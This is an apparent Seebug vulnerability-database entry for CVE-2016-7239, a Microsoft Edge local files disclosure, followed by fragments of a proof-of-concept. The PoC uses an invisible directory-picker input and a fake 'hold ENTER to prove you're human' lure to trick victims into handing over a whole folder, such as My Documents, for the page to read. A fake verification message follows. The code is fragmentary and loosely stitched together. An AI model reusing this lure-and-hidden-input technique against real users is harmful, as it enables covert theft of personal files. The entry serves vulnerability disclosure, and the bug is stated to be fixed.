Microsoft Edge local files disclosure(CVE-2016-7239)

ID SSV:92956
Type seebug
Reporter Root
Modified 2017-04-15T00:00:00


No description provided by source.

                                                 the difference was that the default directory was 'My Documents' so I showed that the folderpicker can be used to recieve all the files within a victims documents folder.
This has since been fixed.
		Read all files on PC - PoC - By @qab
        #thing {
            opacity: 0.0;

    <h3 id="qmsg">Hold down the ENTER key for 5 seconds to prove you're human..</h3>
    <input id="thing" type="file" webkitdirectory mozdirectory accept="text/*" />

		  var r = new FileReader();
        thing.onchange = function() {
            alert('I can read ' + this.files.length + ' files from anywhere on your pc!');//This is for PoC only. We can access all data using this.files as seen next.
        //This is where we detect if the user is holding the Enter button.
        var i = 0;
        document.onkeydown = function() {
            if (i > 4) {
                i = -10000;
                document.onkeydown = null;
                setTimeout(function() {
                    qmsg.innerHTML = '<u>Thank you! Please wait while we verify (this might take a few minutes).</u>';
                }, 1000);